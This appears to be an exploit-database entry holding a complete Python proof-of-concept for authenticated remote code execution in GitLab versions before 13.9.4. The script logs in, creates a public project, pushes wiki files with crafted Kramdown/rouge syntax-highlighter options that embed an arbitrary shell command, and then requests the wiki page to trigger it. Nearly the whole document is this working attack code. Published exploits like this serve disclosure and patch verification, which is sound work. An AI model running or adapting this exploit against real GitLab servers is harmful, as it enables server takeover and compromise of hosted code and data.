toggle-mode

Gitlab 13.9.3 - Remote Code Execution (Authenticated)

enox

# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated)
# Date: 02/06/2021
# Exploit Author: enox
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://gitlab.com/
# Version: < 13.9.4
# Tested On: Ubuntu 20.04
# Environment: Gitlab 13.9.1 CE
# Credits: https://hackerone.com/reports/1125425

#!/usr/bin/python3

import requests
from bs4 import BeautifulSoup
import random
import os
import argparse

parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE')
parser.add_argument('-u', help='Username', required=True)
parser.add_argument('-p', help='Password', required=True)
parser.add_argument('-c', help='Command', required=True)
parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True)
args = parser.parse_args()

username = args.u
password = args.p
gitlab_url = args.t
command = args.c

session = requests.Session()

# Authenticating
print("[1] Authenticating")
r = session.get(gitlab_url + "/users/sign_in")
soup = BeautifulSoup(r.text, features="lxml")
token = soup.findAll('meta')[16].get("content")

login_form = {
    "authenticity_token": token,
    "user[login]": username,
    "user[password]": password,
    "user[remember_me]": "0"
}
r = session.post(f"{gitlab_url}/users/sign_in", data=login_form)

if r.status_code != 200:
    exit(f"Login Failed:{r.text}")
else:
    print("Successfully Authenticated")

# Creating Project
print("[2] Creating Project")
r = session.get(f"{gitlab_url}/projects/new")
soup = BeautifulSoup(r.text, features="lxml")

project_token = soup.findAll('meta')[16].get("content")
project_token = project_token.replace("==", "%3D%3D")
project_token = project_token.replace("+", "%2B")
project_name = f'project{random.randrange(1, 10000)}'
cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],}

payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20"

r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False)

if "The change you requested was rejected." in r.text:
    exit('Exploit failed, check input params')
else:
    print("Successfully created project")


# Cloning Wiki and Writing Files
print("[3] Pushing files to the project wiki")
wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git'
os.system(f"git clone {wiki_url} /tmp/project")

f1 = open("/tmp/project/load1.rmd","w")
f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n')
f1.write('~~~ ruby\n')
f1.write('    def what?\n')
f1.write('      42\n')
f1.write('    end\n')
f1.write('~~~\n')
f1.close()

f2 = open("/tmp/project/load2.rmd","w")
temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n'
f2.write(temp)
f2.write('~~~ ruby\n')
f2.write('    def what?\n')
f2.write('      42\n')
f2.write('    end\n')
f2.write('~~~\n')
f2.close()

# It will prompt for user and pass. Enter it.
os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push')

print("Succesfully Pushed")

# Cleaning Up
os.system('rm -rf /tmp/project')

# Triggering RCE

print("[4] Triggering RCE")
trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2"

r = session.get(trigger_url, cookies=cookies, verify=False)

date: 2021-06-03, platform: webapps, type: ruby